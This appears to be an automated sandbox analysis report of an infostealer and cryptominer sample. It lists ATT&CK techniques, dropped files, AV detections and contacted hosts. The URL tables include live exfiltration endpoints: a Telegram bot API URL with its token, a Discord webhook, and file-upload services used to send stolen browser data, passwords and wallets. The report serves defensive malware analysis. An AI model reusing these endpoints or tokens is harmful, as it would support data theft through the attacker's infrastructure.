                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information111
                                  Scripting
                                  Valid Accounts331
                                  Windows Management Instrumentation
                                  111
                                  Scripting
                                  1
                                  Abuse Elevation Control Mechanism
                                  41
                                  Disable or Modify Tools
                                  1
                                  OS Credential Dumping
                                  2
                                  System Time Discovery
                                  1
                                  Taint Shared Content
                                  1
                                  Archive Collected Data
                                  1
                                  Web Service
                                  Exfiltration Over Other Network Medium1
                                  Data Encrypted for Impact
                                  CredentialsDomainsDefault Accounts2
                                  Native API
                                  11
                                  DLL Side-Loading
                                  11
                                  DLL Side-Loading
                                  11
                                  Deobfuscate/Decode Files or Information
                                  1
                                  Credential API Hooking
                                  3
                                  File and Directory Discovery
                                  Remote Desktop Protocol3
                                  Data from Local System
                                  3
                                  Ingress Tool Transfer
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts113
                                  Command and Scripting Interpreter
                                  321
                                  Registry Run Keys / Startup Folder
                                  311
                                  Process Injection
                                  1
                                  Abuse Elevation Control Mechanism
                                  Security Account Manager48
                                  System Information Discovery
                                  SMB/Windows Admin Shares1
                                  Credential API Hooking
                                  11
                                  Encrypted Channel
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts3
                                  PowerShell
                                  Login Hook321
                                  Registry Run Keys / Startup Folder
                                  21
                                  Obfuscated Files or Information
                                  NTDS241
                                  Security Software Discovery
                                  Distributed Component Object Model1
                                  Clipboard Data
                                  4
                                  Non-Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                                  Software Packing
                                  LSA Secrets2
                                  Process Discovery
                                  SSHKeylogging5
                                  Application Layer Protocol
                                  Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                  DLL Side-Loading
                                  Cached Domain Credentials141
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  File Deletion
                                  DCSync1
                                  Application Window Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                                  Rootkit
                                  Proc Filesystem1
                                  System Network Configuration Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt233
                                  Masquerading
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron141
                                  Virtualization/Sandbox Evasion
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                                  Process Injection
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                  Hidden Files and Directories
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1486327 Sample: VaTlw2kNGc.exe Startdate: 02/08/2024 Architecture: WINDOWS Score: 100 147 api.telegram.org 2->147 149 discord.com 2->149 151 ip-api.com 2->151 177 Found malware configuration 2->177 179 Antivirus detection for dropped file 2->179 181 Sigma detected: Capture Wi-Fi password 2->181 185 28 other signatures 2->185 15 VaTlw2kNGc.exe 13 2->15         started        19 dasHost.exe 2->19         started        21 dasHost.exe 2->21         started        23 cmd.exe 2->23         started        signatures3 183 Uses the Telegram API (likely for C&C communication) 147->183 process4 file5 139 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 15->139 dropped 141 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 15->141 dropped 143 C:\Users\user\AppData\Local\...\python310.dll, PE32+ 15->143 dropped 145 8 other files (7 malicious) 15->145 dropped 159 Found pyInstaller with non standard icon 15->159 25 VaTlw2kNGc.exe 15->25         started        161 Found direct / indirect Syscall (likely to bypass EDR) 19->161 27 conhost.exe 23->27         started        signatures6 process7 process8 29 cmd.exe 1 25->29         started        signatures9 211 Wscript starts Powershell (via cmd or directly) 29->211 213 Very long command line found 29->213 215 Encrypted powershell cmdline option found 29->215 217 5 other signatures 29->217 32 Build.exe 6 29->32         started        36 based.exe 1 72 29->36         started        39 conhost.exe 29->39         started        process10 dnsIp11 101 C:\ProgramData\Microsoft\hacn.exe, PE32+ 32->101 dropped 103 C:\ProgramData\Microsoft\based.exe, PE32+ 32->103 dropped 163 Multi AV Scanner detection for dropped file 32->163 41 hacn.exe 13 32->41         started        45 based.exe 22 32->45         started        153 api.telegram.org 149.154.167.220, 443, 49745 TELEGRAMRU United Kingdom 36->153 155 discord.com 162.159.138.232, 443, 49743 CLOUDFLARENETUS United States 36->155 157 ip-api.com 208.95.112.1, 49742, 80 TUT-ASUS United States 36->157 165 Very long command line found 36->165 167 Found many strings related to Crypto-Wallets (likely being stolen) 36->167 169 Tries to harvest and steal browser information (history, passwords, etc) 36->169 171 6 other signatures 36->171 47 cmd.exe 36->47         started        49 cmd.exe 36->49         started        51 cmd.exe 36->51         started        53 16 other processes 36->53 file12 signatures13 process14 file15 109 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 41->109 dropped 111 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 41->111 dropped 113 C:\Users\user\AppData\Local\Temp\...\s.exe, PE32 41->113 dropped 121 8 other files (7 malicious) 41->121 dropped 191 Multi AV Scanner detection for dropped file 41->191 193 Machine Learning detection for dropped file 41->193 55 hacn.exe 41->55         started        115 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 45->115 dropped 117 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 45->117 dropped 119 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 45->119 dropped 123 16 other files (15 malicious) 45->123 dropped 195 Very long command line found 45->195 197 Modifies Windows Defender protection settings 45->197 199 Adds a directory exclusion to Windows Defender 45->199 201 Removes signatures from Windows Defender 45->201 203 Wscript starts Powershell (via cmd or directly) 47->203 205 Encrypted powershell cmdline option found 47->205 57 powershell.exe 47->57         started        60 conhost.exe 47->60         started        71 2 other processes 49->71 62 powershell.exe 51->62         started        65 conhost.exe 51->65         started        207 Tries to harvest and steal WLAN passwords 53->207 209 Loading BitLocker PowerShell Module 53->209 67 getmac.exe 53->67         started        69 powershell.exe 53->69         started        73 30 other processes 53->73 signatures16 process17 file18 75 cmd.exe 55->75         started        125 C:\Users\user\AppData\...\4kug0kj4.cmdline, Unicode 57->125 dropped 77 csc.exe 57->77         started        233 Loading BitLocker PowerShell Module 62->233 235 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 67->235 237 Writes or reads registry keys via WMI 67->237 80 Conhost.exe 73->80         started        82 Conhost.exe 73->82         started        signatures19 process20 file21 84 s.exe 75->84         started        88 conhost.exe 75->88         started        137 C:\Users\user\AppData\Local\...\4kug0kj4.dll, PE32 77->137 dropped 90 cvtres.exe 77->90         started        process22 file23 105 C:\ProgramData\svchost.exe, PE32 84->105 dropped 107 C:\ProgramData\setup.exe, PE32+ 84->107 dropped 187 Multi AV Scanner detection for dropped file 84->187 189 Drops PE files with benign system names 84->189 92 svchost.exe 84->92         started        96 setup.exe 84->96         started        signatures24 process25 file26 127 C:\Users\user\...\ChainComServermonitor.exe, PE32 92->127 dropped 129 pFG3Duil1NAbFHoInF...Rvb98S0ewJA0VkW.vbe, data 92->129 dropped 131 C:\Users\user\...\oGgyulsi03j6EO3sjCC.bat, ASCII 92->131 dropped 219 Antivirus detection for dropped file 92->219 221 Multi AV Scanner detection for dropped file 92->221 223 Machine Learning detection for dropped file 92->223 98 wscript.exe 92->98         started        133 C:\Users\user\AppData\...\wxyubnjmnlae.tmp, PE32+ 96->133 dropped 135 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 96->135 dropped 225 Writes to foreign memory regions 96->225 227 Modifies the context of a thread in another process (thread injection) 96->227 229 Found hidden mapped module (file has been removed from disk) 96->229 231 3 other signatures 96->231 signatures27 process28 signatures29 173 Wscript starts Powershell (via cmd or directly) 98->173 175 Windows Scripting host queries suspicious COM object (likely to drop second stage) 98->175

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  VaTlw2kNGc.exe47%ReversingLabsWin64.Trojan.Generic
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe100%AviraHEUR/AGEN.1323342
                                  C:\Users\user\AppData\Local\Temp\E9LXmGxXsL.bat100%AviraBAT/Delbat.C
                                  C:\Recovery\winlogon.exe100%AviraHEUR/AGEN.1323342
                                  C:\ProgramData\svchost.exe100%AviraVBS/Runner.VPG
                                  C:\Program Files\Google\Chrome\updater.exe100%AviraTR/CoinMiner.lnxah
                                  C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe100%AviraHEUR/AGEN.1323342
                                  C:\ProgramData\setup.exe100%AviraTR/CoinMiner.lnxah
                                  C:\Program Files\Mozilla Firefox\dwm.exe100%AviraHEUR/AGEN.1323342
                                  C:\Recovery\powershell.exe100%AviraHEUR/AGEN.1323342
                                  C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe100%Joe Sandbox ML
                                  C:\Recovery\winlogon.exe100%Joe Sandbox ML
                                  C:\ProgramData\svchost.exe100%Joe Sandbox ML
                                  C:\ProgramData\Microsoft\hacn.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe100%Joe Sandbox ML
                                  C:\ProgramData\setup.exe100%Joe Sandbox ML
                                  C:\Program Files\Mozilla Firefox\dwm.exe100%Joe Sandbox ML
                                  C:\Recovery\powershell.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Program Files\Mozilla Firefox\dwm.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\ProgramData\Microsoft\based.exe55%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\Microsoft\hacn.exe71%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\setup.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\ProgramData\svchost.exe79%ReversingLabsWin32.Trojan.Uztuby
                                  C:\Recovery\powershell.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Recovery\winlogon.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe21%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\select.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe75%ReversingLabsWin32.Trojan.Casdet
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\select.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp92%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\Users\user\Desktop\CjJRSFHW.log17%ReversingLabs
                                  C:\Users\user\Desktop\EcYAEBsU.log17%ReversingLabs
                                  C:\Users\user\Desktop\GQcIpPoS.log4%ReversingLabs
                                  C:\Users\user\Desktop\HMPjFLLW.log17%ReversingLabs
                                  C:\Users\user\Desktop\IJrrbLaQ.log8%ReversingLabs
                                  C:\Users\user\Desktop\KVBZghxI.log8%ReversingLabs
                                  C:\Users\user\Desktop\MAhhiIaK.log12%ReversingLabs
                                  C:\Users\user\Desktop\NOQISejH.log17%ReversingLabs
                                  C:\Users\user\Desktop\NXnICQCE.log8%ReversingLabs
                                  C:\Users\user\Desktop\PbqyFjSG.log12%ReversingLabs
                                  C:\Users\user\Desktop\RKFGfNRs.log12%ReversingLabs
                                  C:\Users\user\Desktop\THthvKov.log17%ReversingLabs
                                  C:\Users\user\Desktop\UuxpgXjt.log12%ReversingLabs
                                  C:\Users\user\Desktop\bbeWvQkg.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\chceADSX.log8%ReversingLabs
                                  C:\Users\user\Desktop\eeEmWDhS.log12%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                                  https://www.avito.ru/0%URL Reputationsafe
                                  http://ocsp.sectigo.com00%URL Reputationsafe
                                  https://www.python.org/download/releases/2.3/mro/.0%URL Reputationsafe
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                                  https://www.leboncoin.fr/0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                                  https://tools.ietf.org/html/rfc2388#section-4.40%URL Reputationsafe
                                  https://account.bellmedia.c0%URL Reputationsafe
                                  https://weibo.com/0%URL Reputationsafe
                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%URL Reputationsafe
                                  https://login.microsoftonline.com0%URL Reputationsafe
                                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                                  https://www.msn.com0%URL Reputationsafe
                                  https://www.amazon.ca/0%URL Reputationsafe
                                  https://sectigo.com/CPS00%URL Reputationsafe
                                  http://ocsp.thawte.com00%URL Reputationsafe
                                  https://www.amazon.com/0%URL Reputationsafe
                                  https://httpbin.org/0%URL Reputationsafe
                                  http://google.com/0%Avira URL Cloudsafe
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                                  https://www.wykop.pl/0%URL Reputationsafe
                                  https://twitter.com/0%URL Reputationsafe
                                  https://api.telegram.org/bot%s/%s0%Avira URL Cloudsafe
                                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                                  https://www.olx.pl/0%URL Reputationsafe
                                  https://support.mozilla.org/products/firefox0%URL Reputationsafe
                                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                                  https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/29200%Avira URL Cloudsafe
                                  https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
                                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                                  https://MD8.mozilla.org/1/m0%URL Reputationsafe
                                  https://yahoo.com/0%Avira URL Cloudsafe
                                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                  https://bugzilla.mo0%URL Reputationsafe
                                  https://python.org/dev/peps/pep-0263/0%Avira URL Cloudsafe
                                  http://tools.ietf.org/html/rfc6125#section-6.4.30%URL Reputationsafe
                                  https://www.amazon.fr/0%URL Reputationsafe
                                  https://www.openssl.org/H0%URL Reputationsafe
                                  https://support.mozilla.org0%URL Reputationsafe
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                                  https://www.amazon.de/0%URL Reputationsafe
                                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                                  https://api.anonfiles.com/upload0%Avira URL Cloudsafe
                                  https://api.gofile.io/getServerr;r0%Avira URL Cloudsafe
                                  https://www.zhihu.com/0%Avira URL Cloudsafe
                                  https://html.spec.whatwg.org/multipage/0%Avira URL Cloudsafe
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz0%Avira URL Cloudsafe
                                  http://cacerts.digicert.co0%Avira URL Cloudsafe
                                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                                  https://www.rfc-editor.org/rfc/rfc8259#section-8.10%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
                                  http://www.iana.org/time-zones/repository/tz-link.html0%Avira URL Cloudsafe
                                  https://api.gofile.io/getServer0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument0%Avira URL Cloudsafe
                                  http://json.org0%Avira URL Cloudsafe
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
                                  https://www.amazon.co.uk/0%Avira URL Cloudsafe
                                  https://api.gofile.io/getServerr;0%Avira URL Cloudsafe
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax00%Avira URL Cloudsafe
                                  https://www.python.org/dev/peps/pep-0205/0%Avira URL Cloudsafe
                                  http://cacerts.digicert.coH0%Avira URL Cloudsafe
                                  https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt20%Avira URL Cloudsafe
                                  https://google.com/0%Avira URL Cloudsafe
                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%Avira URL Cloudsafe
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
                                  http://google.com/mail/0%Avira URL Cloudsafe
                                  https://google.com/mail/0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2920S0%Avira URL Cloudsafe
                                  https://raw.git0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png0%Avira URL Cloudsafe
                                  https://www.google.com/complete/0%Avira URL Cloudsafe
                                  https://api.anonfiles.com/uploadrU0%Avira URL Cloudsafe
                                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);0%Avira URL Cloudsafe
                                  https://google.com/mail0%Avira URL Cloudsafe
                                  https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
                                  http://ip-api.com/json/?fields=2255450%Avira URL Cloudsafe
                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%Avira URL Cloudsafe
                                  https://www.google.com/0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.0%Avira URL Cloudsafe
                                  https://foss.heptapod.net/pypy/pypy/-/issues/35390%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  discord.com
                                  162.159.138.232
                                  truetrue
                                    unknown
                                    ip-api.com
                                    208.95.112.1
                                    truefalse
                                      unknown
                                      api.telegram.org
                                      149.154.167.220
                                      truetrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocumentfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUyatrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ip-api.com/json/?fields=225545false
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://google.com/based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/chrome_newtabbased.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/Blank-c/BlankOBFbased.exe, 00000008.00000003.1751478048.00000273ED2C1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1751208630.00000273ED49F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752076948.00000273ED2E4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753162300.00000273ED2E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFbased.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot%s/%sbased.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.avito.ru/based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ocsp.sectigo.com0based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.python.org/download/releases/2.3/mro/.VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220AD0000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1749563307.000001A052178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://discordapp.com/api/v9/users/based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://python.org/dev/peps/pep-0263/hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp, based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
